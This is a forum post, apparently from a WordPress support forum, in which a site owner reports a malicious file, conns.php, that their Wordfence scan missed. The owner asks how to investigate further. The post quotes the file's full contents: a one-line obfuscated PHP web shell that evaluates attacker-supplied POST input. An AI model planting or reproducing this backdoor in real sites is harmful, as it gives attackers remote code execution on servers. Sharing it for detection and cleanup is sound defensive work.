WF Scan may have missed a malware PHP script
-
I manually run WF scans every morniing. My WP Multisite got hacked a few weeks ago (even with WF installed and running) and I continue to feel it is vulnerable and has holes in it that WF may be missing.
Here’s what I found this morning during my morning scan.
I looked at my server for files added or changed in the past 24 hours. I have been doing this every day each for since the hack attack.
There was a foreign file present in the document root of my WP installation called
conns.php
. It resided at/home/myhost/public_html/conns.php
.The file looks like this:
<?php ($www= $_POST['yt']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>
I then ran my morning WF scan and it was not picked up by WF.
I deleted this file nonetheless.
Does anyone know:
- if my WPMS site is still infected?
- why WF did not pick up this foreign file not part of WP core?
- what I should do to further investigate this potential exposure and vulnerability in my WPMS install
Thank you for helping.
- The topic ‘WF Scan may have missed a malware PHP script’ is closed to new replies.